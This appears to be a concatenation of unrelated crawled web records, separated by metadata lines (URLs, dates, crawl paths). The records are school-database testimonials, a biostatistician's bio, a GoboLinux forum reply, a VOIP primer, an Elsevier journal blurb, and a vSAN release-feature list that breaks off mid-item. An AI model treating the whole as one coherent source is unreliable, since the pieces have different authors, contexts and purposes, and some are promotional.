Blackbaud means no more manually importing csv files to keep data in sync. CORESystems expertise, personal attention and support is unmatched!" 
— Adam Gerson, Director of Technology We built a database which extractrs data from Raiser's Edge, Whipple Hill, and a Filemaker system, and which performs comparisons of data and automatically delivers discrepancy reports each evening. "The module, designed and implemented by CORESystems, was a huge breakthrough for us that we had needed for many years. The new system coordinates the ability to have a data-dump from multiple sources and merge them into one database - from which we can compare fields based on stored mappings. It also performs a nightly refresh of data and emails a report about it. The automatic nightly report is functionality the school did not have before and it is invaluable in trying to keep two non-talking databases in sync." — Katherine Schulze, Director of Technology We built a database and website to manage a complicated after-school program enrollment system. The database makes use of data from existing Filemaker system which ensured the integrity of the historical data and made the project more cost-effective for the school. The office staff has a direct interface to the new system for generating rosters, recording attendance, generating billing lists, communicating with instructors and communicating with the parent community. Parents use the website to enroll their children in after-school program and after-care offerings on both a consistent and drop-in basis. "The new system allows us to keep our flexible care offerings to parents, while not exhausting staff resources in updating lists and records. The office can quickly download accurate lists and records that are easy to share with the parent community. The new system is linked to our admissions' database allowing me ready access to student/family information. It is so valuable that the database is built to grow with our programming. The new system is absolutely amazing and there is no going back. The ongoing support is superb." — Nicole Lehrer, Director of Auxiliary Programming We built a Filemaker file to draw data from an existing all-school database — Teachers use a neat Tool feature to select Students, Behavior Types, and to enter note for Advisors and parents, who are notified by email. It also includes totals reports by grade, advisor, team color, etc. "CORESystems helped us develop a system that handles our very complex rotating block schedule, two campuses, 3-4 bus systems and different grade reports for almost every grade. They listened to our needs and the solution they created has been a godsend. Where before we had a home grown FileMaker database that over the years was cobbled together to deal with code of conduct infractions and rewards, we now have a streamlined system with an elegant user interface and which requires little or not maintenance." — Michael Beesley, Director of Technology We built a collection of three Filemaker files which are refreshed nightly via ODBC and contain an Enroller Tool for managing class rosters, a teacher interface with highly customized, class-specific layouts, and tools for proofreaders which make reviewing, printing, and PDF'ing simple and efficient. "Totally Awesome! is how I describe the three report card modules CORESytems built for us. In particular, the Enroller module cuts my time in half when creating and editing teacher and student schedules for the reports system. Also, the ODBC-driven reloading of Education Edge data has worked flawlessly for years. I can't think of anything better." 
— Doug Melillo, IT Support & System Operator "CORESystems' solutions are designed to maximize our productivity while minimizing errors when used by multiple users of varying abilities. Their designs also allow for easy updates and expansion as programs grow in reach and capability." Sunil Gupta, Director of Technology, Brunswick School CORESystems understands complex educational communities. Founded by an independent school teacher and administrator of 14 years, CORESystems gives teachers and parents ways to more efficiently record and communicate about student progress so that the better majority of their time was working directly with the student themselves. CORESystems quickly evolved to include all facets of school administration, including financial tracking, alumnae services, development, afterschool programs and summer camps. The CORESystems team challenges itself to build better, more streamlined, more efficient systems with the highest customer satisfaction. Their enthusiasm has resulted in data systems that are extremely personalized and have unparalleled support. As a customer of 13 years wrote, "You transformed my work environment! Your superb customization and highly personalized service continues to set CORESystems apart." "You guys rock!" Christine LaRegina, Registrar, Rippowam Cisqua School
systems_science
https://www.brad-carlin.com/about-bradley-carlin/
2020-07-13T04:18:26
s3://commoncrawl/crawl-data/CC-MAIN-2020-29/segments/1593657142589.93/warc/CC-MAIN-20200713033803-20200713063803-00190.warc.gz
0.955188
310
CC-MAIN-2020-29
webtext-fineweb__CC-MAIN-2020-29__0__126534962
en
Bradley Carlin is a PhD biostatistician with a strong interest and professional background in clinical study design, data analysis, programming, report-writing, methods development, and interaction with clients and regulatory authorities. Brad currently serves as the Founder and President of Counterpoint Statistical Consulting, a Minneapolis-based consulting firm that specializes in using data and modeling to find solutions to challenging problems in biomedicine. He previously served as the Head of the Division of Biostatistics at the University of Minnesota. Brad’s training and research has focused on hierarchical Bayesian statistical modeling and associated computational methods, including Markov chain Monte Carlo (MCMC) methods. He has a proven track record of publishing and externally funded methodological grant support in Bayesian methods, computing, and applications related to spatial and environmental statistics, clinical trials, and meta-analysis, as well as mentoring the research of others. Brad has also been involved in the creation and dissemination of user-friendly software for implementing these models in practice; both through his own website and through the CRAN archive. As the Head of the Division of Biostatistics at the University of Minnesota Brad taught a variety of both traditional academic courses and government, industry, and professional short courses in hierarchical Bayesian modeling and its implementation via the R and BUGS packages, with special emphasis on Bayesian adaptive clinical trials, including simulation of procedure operating characteristics. Brad has coauthored three leading textbooks on Bayesian methods, including one on adaptive methods for clinical trials.
systems_science
https://gobolinux.discourse.group/t/advantages-over-appimage/47
2021-07-26T17:25:06
s3://commoncrawl/crawl-data/CC-MAIN-2021-31/segments/1627046152144.81/warc/CC-MAIN-20210726152107-20210726182107-00133.warc.gz
0.953863
405
CC-MAIN-2021-31
webtext-fineweb__CC-MAIN-2021-31__0__34370768
en
Just out of curiosity, does Gobolinux solve any problems which appimages don't? Assuming every piece of user-space software had an appimage distribution, would Gobolinux still have a technical advantage over a more traditional Unix system?

There are fundamental differences between the two approaches. AppImages are mostly self-contained file system images that include the main program along with its dependencies. They're conceptually more similar to Docker than to a distro such as GoboLinux – although with Docker you still have the benefit of reusing file system layers; in that case, AppImages are better compared to statically linked programs. Both AppImages and Docker attempt to solve the problem of software distribution by bundling dependencies with the main program. GoboLinux manages the installation of programs in a lightweight fashion as a regular distro does. The difference is that it's possible to let multiple (and conflicting) versions of libraries coexist and to create file system mappings that ensure the file system tree seen by a given program contains the right version of the dependencies it expects.

My personal view on this is that distros are becoming container hosts and that, at some point in the future, when technical improvements like minimization of userspace filesystem overhead and improved deduplication at the storage layer are built into the kernels run by those distros, the technical advantages will tend to disappear. You will probably enjoy reading about the work done by RancherOS. They've made a distribution that's precisely a container manager: every single package is self-contained in its own container, including essential system services.

To be honest, the main advantage of any traditional Linux system over a container-heavy system is performance. If you have new enough hardware and don't care much about power consumption, you can use all the containers you want, I suppose. I personally prefer a lean system, and I also prefer to have my software run locally.
systems_science
http://techijournal.blogspot.com/
2017-05-23T18:32:55
s3://commoncrawl/crawl-data/CC-MAIN-2017-22/segments/1495463607649.26/warc/CC-MAIN-20170523183134-20170523203134-00467.warc.gz
0.905951
387
CC-MAIN-2017-22
webtext-fineweb__CC-MAIN-2017-22__0__212243939
en
"VOIP", "IP Telephony", "Internet Telephony" are used interchangeably. It is also defined as the ability to transfer voice, fax and video over IP. 1995 - VocalTec has first introduced IP Telephony software product "Internet Phone" in 1995. This year is called the year of the Hobbyist. 1996 The year of Gateway. 1998 The year of Gatekeeper 1999 The year of the application Gateways: These are used to adapt traditional telephony to the Intenet. Gatekeepers: Responsible for address resolution and call routing. Codec's: Coders are used for efficient bandwidth utilization. The coder-decoder compression schemes (CODEC's) are enabled for both ends of connection and the conservations proceeds using Real-time Transport Protocol (RTP)/ User Datagram Protocol (UDP)/Internet Protocol (IP) as the protocol stack. In VOIP systems, analog voice signals are digitized and transmitted as a stream of data packets over a digital data network (called packet switched networks). In public switched telephone networks or PSTN (called Circuit-switched networks), a telephone call is reserved an end-to-end physical circuit between the origin and the destination for the duration of the call. Hence, for this duration of the call, the circuit is fully available to that call and is not available to any other network users. Whereas in packet switched networks, instead of reserving a circuit between endpoints, messages or files are broken up into many small packets and each packet might be taking different route from origin to destination. Thus circuit switched networks have poor utilization of network resources whereas this is eliminated in packet switched networks. Add-on services and unified messaging Merging of Voice and data Quality of Service (QoS) Quality of Voice (QoV) Standards and Interoperability
systems_science
http://www.us.elsevierhealth.com/product.jsp?isbn=9781455710300&navAction=&navCount=1
2015-10-08T16:40:14
s3://commoncrawl/crawl-data/CC-MAIN-2015-40/segments/1443737896527.58/warc/CC-MAIN-20151001221816-00023-ip-10-137-6-227.ec2.internal.warc.gz
0.890477
257
CC-MAIN-2015-40
webtext-fineweb__CC-MAIN-2015-40__0__10972672
en
(With Adobe DRM, readable with Adobe Digital Editions for PCs and Macs, and on most mobile devices except Kindle) This cutting-edge issue of Anesthesiology Clinics is divided into two sections. The first covers topics in perioperative clinical information systems (IS), including the following. The anatomy of an anesthesia information management system; vendor and market landscape; impact of lexicons on adoption of an IS; clinical research using an IS, real-time alerts and reminders using an IS; shortcomings and challenges of IS adoption; creating a real return-on-investment for IS implementation (life after HITECH); Quality improvement using automated data sources and reporting; and opportunities and challenges of implementing an enterprise IS in the OR. Section 2 is devoted to computers and covers the following topics. Advanced integrated real-time clinical displays; enhancing point-of-care vigilance using computers; and computers in perioperative simulation and education. Elsevier is a leading publisher of health science books and journals, helping to advance medicine by delivering superior education, reference information and decision support tools to doctors, nurses, health practitioners and students. With titles available across a variety of media—print, online and mobile, we are able to supply the information you need in the most convenient format.
systems_science
https://virtualguru.cz/2023/11/06/vsan-versions-whats-new/
2023-12-01T14:02:06
s3://commoncrawl/crawl-data/CC-MAIN-2023-50/segments/1700679100287.49/warc/CC-MAIN-20231201120231-20231201150231-00160.warc.gz
0.859899
12,028
CC-MAIN-2023-50
webtext-fineweb__CC-MAIN-2023-50__0__26629107
en
Since older versions are gradually falling out of support, and their documentation is consequently "disappearing", I decided to create a page to which, with every new version, I will add the improvements that version brings. I did not manage to capture the earliest versions before their release notes were removed from the documentation.
- All-flash configurations
- 64 host cluster scalability
- 2x performance increase for hybrid configurations
- New snapshot mechanism
- Enhanced cloning mechanism
- Fault domain/rack awareness
- Stretched clustering across a max of 5 ms RTT
- 2-node vSAN for remote office, branch office solutions
- VRealize operations management pack
- vSphere Replication 5 minute RPO
- Health monitoring
- RAID 5/6 over network (Erasure coding)
- Space Efficiency (deduplication and compression)
- QoS – IOPS limits
- Software checksums
- IPv6 support
- Performance monitoring
- iSCSI target service. The Virtual SAN iSCSI target service enables physical workloads that are outside the Virtual SAN cluster to access the Virtual SAN datastore. An iSCSI initiator on a remote host can transport block-level data to an iSCSI target on a storage device in the Virtual SAN cluster.
- 2 Node Direct Connect with witness traffic separation. Virtual SAN 6.5 provides support for an alternate VMkernel interface to communicate with the witness host in a stretched cluster configuration. This support enables you to separate witness traffic from Virtual SAN data traffic, with no routing required from the Virtual SAN network to the witness host. You can simplify connectivity to the witness host in certain stretched cluster and 2 Node configurations. In 2 Node configurations, you can make one or more node-to-node, direct connections for Virtual SAN data traffic, without using a high speed switch. Using an alternate VMkernel interface for witness traffic is supported in stretched cluster configurations, but only when it is connected to the same physical switch as the interface used for Virtual SAN data traffic.
- PowerCLI support. VMware vSphere PowerCLI adds command-line scripting support for Virtual SAN, to help you automate configuration and management tasks. vSphere PowerCLI provides a Windows PowerShell interface to the vSphere API. PowerCLI includes cmdlets for administering Virtual SAN components.
- 512e drive support. Virtual SAN 6.5 supports 512e magnetic hard disk drives (HDDs) in which the physical sector size is 4096 bytes, but the logical sector size emulates a sector size of 512 bytes.
- Unicast. In vSAN 6.6 and later releases, multicast is not required on the physical switches that support the vSAN cluster. If some hosts in your vSAN cluster are running earlier versions of software, a multicast network is still required.
- Encryption. vSAN supports data-at-rest encryption of the vSAN datastore. When you enable encryption, vSAN performs a rolling reformat of every disk group in the cluster. vSAN encryption requires a trusted connection between vCenter Server and a key management server (KMS). The KMS must support the Key Management Interoperability Protocol (KMIP) 1.1 standard.
- Enhanced stretched cluster availability with local fault protection. You can provide local fault protection for virtual machine objects within a single site in a stretched cluster. Define a Primary level of failures to tolerate for the cluster, and a Secondary level of failures to tolerate for objects within a single site. When one site is unavailable, vSAN maintains availability with local redundancy in the available site. - Change witness host. You can change the witness host for a stretched cluster. On the Fault Domains and Stretched Cluster page, click Change witness host. - Configuration Assist and Updates. You can use the Configuration Assist and Updates pages to check the configuration of your vSAN cluster, and resolve any issues. - Configuration Assist helps you verify the configuration of cluster components, resolve issues, and troubleshoot problems. Configuration checks are divided into categories, similar to those in the vSAN health service. The configuration checks cover hardware compatibility, network, and vSAN configuration options. - You can use the Updates page to update storage controller firmware and drivers to meet vSAN requirements. - Resynchronization throttling. You can throttle the IOPS used for cluster resynchronization. Use this control if latencies are rising in the cluster due to resynchronization, or if resynchronization traffic is too high on a host. - Health service enhancements. New and enhanced health checks for encryption, cluster membership, time drift, controller firmware, disk groups, physical disks, disk balance. Online health checks can monitor vSAN cluster health and send the data to the VMware analytics backend system for advanced analysis. You must participate in the Customer Experience Improvement Program to use online health checks. - Updated Host-based vSAN monitoring. You can monitor vSAN health and basic configuration through the ESXi host client. In the host client navigator, click Storage. Select the vSAN datastore, and then click Monitor. Click the tabs to view vSAN information for the host. On the vSAN tab, you can click Edit Settings to correct configuration issues at the host level. - Performance service enhancements. vSAN performance service includes statistics for networking, resynchronization, and iSCSI. You can select saved time ranges in performance views. vSAN saves each selected time range when you run a performance query. - vSAN integration with vCenter Server Appliance. You can create a vSAN cluster as you deploy a vCenter Server Appliance, and host the appliance on that cluster. The vCenter Server Appliance Installer enables you to create a one-host vSAN cluster, with disks claimed from the host. vCenter Server Appliance is deployed on the vSAN cluster. - Maintenance mode enhancements. The Confirm Maintenance Mode dialog box provides information to guide your maintenance activities. You can view the impact of each data evacuation option. For example, you can check whether enough free space is available to complete the selected option. - Rebalancing and repair enhancements. Disk rebalancing operations are more efficient. Manual rebalancing operation provides better progress reporting. - Rebalancing protocol has been tuned to be more efficient and achieve better cluster balance. Manual rebalance provides more updates and better progress reporting. - More efficient repair operations require fewer cluster resynchronizations. 
vSAN can partially repair degraded or absent components to increase the Failures to tolerate even if vSAN cannot make the object compliant. - Disk failure handling. If a disk experiences sustained high latencies or congestion, vSAN considers the device as a dying disk, and evacuates data from the disk. vSAN handles the dying disk by evacuating or rebuilding data. No user action is required, unless the cluster lacks resources or has inaccessible objects. When vSAN completes evacuation of data, the health status is listed as DyingDiskEmpty. vSAN does not unmount the failed device. - New esxcli commands. - Display vSAN cluster health: esxcli vsan health - Display vSAN debug information: esxcli vsan debug - vSphere Update Manager build recommendations for vSAN. Update Manager can scan the vSAN cluster and recommend host baselines that include updates, patches, and extensions. It manages recommended baselines, validates the support status from vSAN HCL, and downloads the correct ESXi ISO images from VMware. vSAN requires Internet access to generate build recommendations. If your vSAN cluster uses a proxy to connect to the Internet, vSAN can generate recommendations for patch upgrades, but not for major upgrades. - Performance diagnostics. The performance diagnostics tool analyzes previously executed benchmark tests. It detects issues, suggests remediation steps, and provides supporting performance graphs for further insight. Performance diagnostics requires participation in the Customer Experience Improvement Program (CEIP). - Increased support for locator LEDs on vSAN disks. Gen-9 HPE controllers in pass-through mode now support vSAN activation of locator LEDs. Blinking LEDs help to identify and isolate specific drives. - 4Kn drive support. vSAN 6.7 supports 4K Native disk drives. 4Kn drives provide higher capacity densities compared to 512n. This support enables you to deploy storage heavy configurations using 4Kn drives with higher capacity points. - vSphere and vSAN FIPS 140-2 validation. vSAN 6.7 encryption has been validated for the Federal Information Processing Standard 140-2. FIPS validated software modules have numerous advantages over special purpose hardware, because they can be executed on a general-purpose computing system, providing portability and flexibility. You can configure a vSAN host using any HCL-compatible set of drives in thousands of form factors, capacities and features, while maintaining data security using FIPS 140-2 validated modules. - HTML interface. The HTML5-based vSphere Client ships with vCenter Server alongside the Flex-based vSphere Web Client. The vSphere Client uses many of the same interface terminologies, topologies, and workflows as the vSphere Web Client. You can use the new vSphere Client, or continue to use the vSphere Web Client. - vRealize Operations within vCenter Server. The vSphere Client includes an embedded vRealize Operations plugin that provides basic vSAN and vSphere operational dashboards. The plugin provides a method to easily deploy a new vROps instance or specify an existing instance in the environment, one of which is required to access the dashboards. The vROps plugin does not require any additional vROps licensing. - Windows Server Failover Clustering support. vSAN 6.7 supports Windows Server Failover Clustering by building WSFC targets on top of vSAN iSCSI targets. vSAN iSCSI target service supports SCSI-3 Persistent Reservations for shared disks and transparent failover for WSFC. WSFC can run on either physical servers or VMs. 
- Intelligent site continuity for stretched clusters. In the case of a partition between the preferred and secondary data sites, vSAN 6.7 will intelligently determine which site leads to maximum data availability before automatically forming quorum with the witness. The secondary site can operate as the active site until the preferred site has the latest copy of the data. This prevents the VMs from migrating back to the preferred site and losing locality of data reads. - Witness traffic separation for stretched clusters. You now have the option to configure a dedicated VMkernel NIC for witness traffic. The witness VMkernel NIC does not transmit any data traffic. This feature enhances data security by isolating the witness traffic from vSAN data traffic. It also is useful when the witness NIC has less bandwidth and latency compared to the data NICs. - Efficient inter-site resync for stretched clusters. Instead of resyncing all copies across the inter-site link for a rebuild or repair operation, vSAN 6.7 sends only one copy and performs the remaining resyncs from that local copy. This reduces the amount of data transmitted between sites in a stretched cluster. - Fast failovers when using redundant vSAN networks. When vSAN 6.7 is deployed with multiple VMkernel adapters for redundancy, failure of one of the adapters will result in immediate failover to the other VMkernel adapter. In prior releases, vSAN waits for TCP to timeout before failing over network traffic to healthy VMkernel adapters. - Adaptive resync for dynamic management of resynchronization traffic. Adaptive resynchronization speeds up time to compliance (restoring an object back to its provisioned failures to tolerate) by allocating dedicated bandwidth to resynchronization I/O. Resynchronization I/O is generated by vSAN to bring an object back to compliance. While minimum bandwidth is guaranteed for resynchronization I/Os, the bandwidth can be increased dynamically if there is no contention from the client I/O. Conversely, if there are no resynchronization I/Os, client I/Os can use the additional bandwidth. - Consolidation of replica components. During placement, components belonging to different replicas are placed in different fault domains, due to the replica anti-affinity rule. However, when the cluster is running at high capacity utilization and objects must be moved or rebuilt, either because of maintenance operation or failure, enough FDs might not be available. Replica consolidation is an improvement over the point fix method used in vSAN 6.6. Whereas point fix reconfigures the entire RAID tree (considerable data movement), replica consolidation moves the least amount of data to create FDs that meet the replica anti-affinity requirement. - Host pinning for shared nothing applications. vSAN Host Pinning is a new storage policy that adapts the efficiency and resiliency of vSAN for next-generation, shared-nothing applications. With this policy, vSAN maintains a single copy of the data and stores the data blocks local to the ESXi host running the VM. This policy is offered as a deployment choice for Big Data (Hadoop, Spark), NoSQL, and other such applications that maintain data redundancy at the application layer. vSAN Host Pinning has specific requirements and guidelines that require VMware validation to ensure proper deployment. You must work with your VMware representative to ensure the configuration is validated before deploying this policy. - Enhanced diagnostics partition (coredump) support. 
vSAN 6.7 automatically resizes the coredump partition on USB/SD media if there is free space on the device, so that coredumps and logs can be persisted locally. If there is insufficient free space or no boot device is present, then no re-partitioning is performed. - vSAN destaging optimizations. vSAN 6.7 includes enhancements to improve the speed at which data is written from the caching tier to the capacity tier. These changes will improve the performance of VM I/Os and resynchronization speed. - Health check additions and improvements. vSAN 6.7 includes several new health checks and improvements to the health service for better proactive and reactive guidance. - vSAN Support insight. vSAN 6.7 has improved customer support by providing anonymized environmental data to VMware Global Support Services (GSS) for proactive support and faster troubleshooting. Customer enrollment in the Customer Experience Improvement Program (CEIP) is required to receive this benefit. - Swap object thin provisioning and policy inheritance improvements. VM swap files in vSAN 6.7 inherit the VM storage policy for all settings, including thin provisioning. In prior versions, the swap file was always thick provisioned. - Guided cluster creation and extension. vSAN 6.7 Update 1 introduces a Quickstart wizard in the vSphere Client. The Quickstart workflow guides the user through the deployment process for vSAN and non-vSAN clusters. It covers every aspect of the initial configuration, such as host, network, and vSphere settings. Quickstart also plays a part in the ongoing expansion of a vSAN cluster by allowing a user to add additional hosts to the cluster. - HBA firmware update through VUM. Storage I/O controller firmware for vSAN hosts is now included as part of the vSphere Update Manager remediation workflow. This functionality was previously provided in a vSAN utility called Configuration Assist. VUM also supports custom ISOs that are provided by certain OEM vendors and vCenter Servers that do not have internet connectivity. - Maintenance mode enhancements. vSAN now performs a simulation of data evacuation to determine if the operation will succeed or fail before it starts. If the evacuation will fail, vSAN halts the operation before any resynchronization activity begins. In addition, the vSphere Client enables you to modify the component repair delay timer, so you can adjust this setting. - Historical and usable capacity reporting. vSAN 6.7 Update 1 introduces a historical capacity dashboard that reports on capacity usage over a period of time, including historical changes to the deduplication ratio. This release also includes a usable capacity estimator, which enables you to see the usable datastore capacity based on a selected storage policy. - TRIM/UNMAP for storage efficiency. vSAN 6.7 Update 1 now has full awareness of TRIM/UNMAP commands sent from the Guest OS, and reclaims previously allocated blocks as free space within the underlying vSAN objects. TRIM/UNMAP can be configured in automatic or offline mode, which is set within the Guest OS. - Mixed MTU for witness traffic separation. vSAN now supports different MTU settings for the witness traffic VMkernel interface and the vSAN data network VMkernel interface. This capability provides increased network flexibility for stretched clusters and 2-node clusters that utilize witness traffic separation. - Health check enhancements. Storage controller firmware health check now supports multiple approved firmware levels to provide additional flexibility. 
You can silence health checks from the UI. You can purge inaccessible swap objects that are no longer needed. The All hosts have matching subnets health check has been deprecated. - Unicast network performance test. A new proactive network performance test, based on Unicast, determines if all hosts in the cluster have proper connectivity and meet bandwidth recommendations. - vRealize Operations enhancements within vCenter Server. Native vROps dashboards built into vCenter Server can display intelligence for vSAN stretched clusters. Additionally, the deployment process now supports virtual distributed switches and full compatibility with vROps 7.0. - In-product support diagnostics. vSAN 6.7 Update 1 introduces product diagnostics to assist VMware Global Support in resolving customer cases more quickly. Specialized performance dashboards in vCenter Server, and an on-demand network diagnostic test, reduce the need to generate and upload support bundles to GSS, speeding time to resolution of support cases. In addition, health check history is stored in a log file to aid support personnel. - Updated Advanced settings. The vSphere Client provides an Advanced settings dialog box (Configure > vSAN > Services > Advanced Options). You can adjust the component repair delay timer. You also can enable/disable thin swap files, and site read locality. - vSAN performance enhancements. This release provides improved performance and availability SLAs on all-flash configurations with deduplication enabled. Latency sensitive applications have better performance in terms of predictable I/O latencies and increased sequential I/O throughput. Rebuild times on disk and node failures are shorter, which provides better availability SLAs. - Enhanced capacity monitoring. The capacity monitoring dashboard has been redesigned for improved visibility of overall usage, granular breakdown, and simplified capacity alerting. Capacity-related health checks are more visible and consistent. Granular capacity utilization is available per site, fault domain, and at the host/disk group level. - Enhanced resync monitoring. The Resyncing Objects dashboard introduces new logic to improve the accuracy of resync completion times, as well as granular visibility into different types of resyncing activity, such as rebalancing or policy compliance. - Data migration pre-check for maintenance mode operations. This release of vSAN introduces a dedicated dashboard to provide in-depth analysis for host maintenance mode operations, including a more descriptive pre-check for data migration activities. This report provides deeper insight into object compliance, cluster capacity and predicted health before placing a host into maintenance mode. - Increased hardening during capacity-strained scenarios. This release includes new robust handling of capacity usage conditions for improved detection, prevention, and remediation of conditions where cluster capacity has exceeded recommended thresholds. - Proactive rebalancing enhancements. You can automate all rebalancing activities with cluster-wide configuration and threshold settings. Prior to this release, proactive rebalancing was manually initiated after being alerted by vSAN health checks. - Efficient capacity handling for policy changes. This release of vSAN introduces new logic to reduce the amount of space temporarily consumed by policy changes across the cluster. 
vSAN processes policy resynchronizations in small batches, which efficiently utilizes capacity from the slack space reserve and simplifies user operations. - Disk format conversion pre-checks. All disk group format conversions that require a rolling data evacuation now include a backend pre-check which accurately determines success or failure of the operation before any movement of data. - Parallel resynchronization. vSAN 6.7 Update 3 includes optimized resynchronization behavior, which automatically runs additional data streams per resyncing component when resources are available. This new behavior runs in the background and provides greater I/O management and performance for workload demands. - Windows Server Failover Clusters (WSFC) on native vSAN VMDKs. vSAN 6.7 Update 3 introduces native support for SCSI-3 PR, which enables Windows Server Failover Clusters to be deployed directly on VMDKs as first class workloads. This capability makes it possible to migrate legacy deployments on physical RDMs or external storage protocols to vSAN. - Enable Support Insight in the vSphere Client. You can enable vSAN Support Insight, which provides access to all vSAN proactive support and diagnostics based on the CEIP, such as online vSAN health checks, performance diagnostics and improved support experience during SR resolution. - vSphere Update Manager (VUM) baseline preference. This release includes an improved vSAN update recommendation experience from VUM, which allows users to configure the recommended baseline for a vSAN cluster to either stay within the current version and only apply available patches or updates, or upgrade to the latest ESXi version that is compatible with the cluster. - Upload and download VMDKs from a vSAN datastore. This release adds the ability to upload and download VMDKs to and from the vSAN datastore. This capability provides a simple way to protect and recover VM data during capacity-strained scenarios. - vCenter forward compatibility with ESXi. vCenter Server can manage newer versions of ESXi hosts in a vSAN cluster, as long as both vCenter and its managed hosts have the same major vSphere version. You can apply critical ESXi patches without updating vCenter Server to the same version. - New performance metrics and troubleshooting utility. This release introduces a vSAN CPU metric through the performance service, and provides a new command-line utility (vsantop) for real-time performance statistics of vSAN, similar to esxtop for vSphere. - vSAN iSCSI service enhancements. The vSAN iSCSI service has been enhanced to allow dynamic resizing of iSCSI LUNs without disruption. - Cloud Native Storage. Cloud Native Storage is a solution that provides comprehensive data management for stateful applications. With Cloud Native Storage, vSphere persistent storage integrates with Kubernetes. When you use Cloud Native Storage, you can create persistent storage for containerized stateful applications capable of surviving restarts and outages. Stateful containers orchestrated by Kubernetes can leverage storage exposed by vSphere (vSAN, VMFS, NFS) while using standard Kubernetes volume, persistent volume, and dynamic provisioning primitives. - vSphere Lifecycle Manager. vSphere Lifecycle Manager enables simplified, consistent lifecycle management for your ESXi hosts. It uses a desired-state model that provides lifecycle management for the hypervisor and the full stack of drivers and firmware.
vSphere Lifecycle Manager reduces the effort to monitor compliance for individual components and helps maintain a consistent state for the entire cluster. In vSAN 7.0, this solution supports Dell and HPE ReadyNodes. With vCenter Server 7.0.0a, vSAN File Services and vSphere Lifecycle Manager can be enabled simultaneously on the same vSAN cluster. - Integrated File Services. vSAN native File Service delivers the ability to leverage vSAN clusters to create and present NFS v4.1 and v3 file shares. vSAN File Service extends vSAN capabilities to files, including availability, security, storage efficiency, and operations management. - Native support for NVMe hot plug. This enhancement delivers a consistent way of servicing NVMe devices, and provides operational efficiency for select OEM drives. - I/O redirect based on capacity imbalance with stretched clusters. vSAN redirects all VM I/O from a capacity-strained site to the other site, until the capacity is freed up. This feature improves uptime of your VMs. - Skyline integration with vSphere health and vSAN health. Joining forces under the Skyline brand, Skyline Health for vSphere and vSAN are available in the vSphere Client, enabling a native, in-product experience with consistent proactive analytics. - Remove EZT for shared disk. vSAN 7.0 eliminates the prerequisite that shared virtual disks using the multi-writer flag must also use the eager zero thick format. - Support vSAN memory as metric in performance service. vSAN memory usage is now available within the vSphere Client and through the API. - Visibility of vSphere Replication objects in vSAN capacity view. vSphere replication objects are visible in vSAN capacity view. Objects are recognized as vSphere replica type, and space usage is accounted for under the Replication category. - Support for large capacity drives. Enhancements extend support for 32TB physical capacity drives, and extend the logical capacity to 1PB when deduplication and compression is enabled. - Immediate repair after new witness is deployed. When vSAN performs a replace witness operation, it immediately invokes a repair object operation after the witness has been added. - vSphere with Kubernetes integration. CNS is the default storage platform for vSphere with Kubernetes. This integration enables various stateful containerized workloads to be deployed on vSphere with Kubernetes Supervisor and Guest clusters on vSAN, VMFS and NFS datastores. - File-based persistent volumes. Kubernetes developers can dynamically create shared (Read/Write/Many) persistent volumes for applications. Multiple pods can share data. vSAN native File Services is the foundation that enables this capability. - vVol support for modern applications. You can deploy modern Kubernetes applications to external storage arrays on vSphere using the CNS support added for vVols. vSphere now enables unified management for Persistent Volumes across vSAN, NFS, VMFS and vVols. - vSAN VCG notification service. You can subscribe to vSAN HCL components such as vSAN ReadyNode, I/O controller, drives (NVMe, SSD, HDD) and get notified through email about any changes. The changes include firmware, driver, driver type (async/inbox), and so on. You can track the changes over time with new vSAN releases. - New: Default gateway override. With ESXi 7.0b, vSAN enables you to override the default gateway for the vSAN VMkernel adapter on each host, and configure a gateway address for the vSAN network. Scale Without Compromise - HCI Mesh.
HCI Mesh is a software-based approach for disaggregation of compute and storage resources in vSAN. HCI Mesh brings together multiple independent vSAN clusters by enabling cross-cluster utilization of remote datastore capacity within vCenter Server. HCI Mesh enables you to efficiently utilize and consume data center resources, which provides simple storage management at scale. - vSAN File Service enhancements. Native vSAN File Service includes support for SMB file shares. Support for Microsoft Active Directory, Kerberos authentication, and scalability improvements also are available. - Compression-only vSAN. You can enable compression independently of deduplication, which provides a storage efficiency option for workloads that cannot take advantage of deduplication. With compression-only vSAN, a failed capacity device only impacts that device and not the entire disk group. - Increased usable capacity. Internal optimizations allow vSAN to no longer need the 25-30% of free space available for internal operations and host failure rebuilds. The amount of space required is a deterministic value based on deployment variables, such as size of the cluster and density of storage devices. These changes provide more usable capacity for workloads. - Shared witness for two-node clusters. vSAN 7.0 Update 1 enables a single vSAN witness host to manage multiple two-node clusters. A single witness host can support up to 64 clusters, which greatly reduces operational and resource overhead. - vSAN Data-in-Transit encryption. This feature enables secure over the wire encryption of data traffic between nodes in a vSAN cluster. vSAN data-in-transit encryption is a cluster-wide feature, and can be enabled independently or along with vSAN data-at-rest encryption. Traffic encryption uses the same FIPS-2 validated cryptographic module as existing encryption features, and does not require use of a KMS server. - Enhanced data durability during maintenance mode. This improvement protects the integrity of data when you place a host into maintenance mode with the Ensure Accessibility option. All incremental writes which would have been written to the host in maintenance are now redirected to another host, if one is available. This feature benefits VMs that have PFTT=1 configured, and also provides an alternative to using PFTT=2 for ensuring data integrity during maintenance operations. - vLCM enhancements. vSphere Lifecycle Manager (vLCM) is a solution for unified software and firmware lifecycle management. In this release, vLCM is enhanced with firmware support for Lenovo ReadyNodes, awareness of vSAN stretched cluster and fault domain configurations, additional hardware compatibility pre-checks, and increased scalability for concurrent cluster operations. - Reserved capacity. You can enable capacity reservations for internal cluster operations and host failure rebuilds. Reservations are soft-thresholds designed to prevent user-driven provisioning activity from interfering with internal operations, such as data rebuilds, rebalancing activity, or policy re-configurations. - Default gateway override. You can override the default gateway for VMkernel adapter to provide a different gateway for vSAN network. This feature simplifies routing configuration for stretched clusters, two-node clusters, and fault domain deployments that previously required manual configuration of static routes. Static routing is not necessary. - Faster vSAN host restarts. 
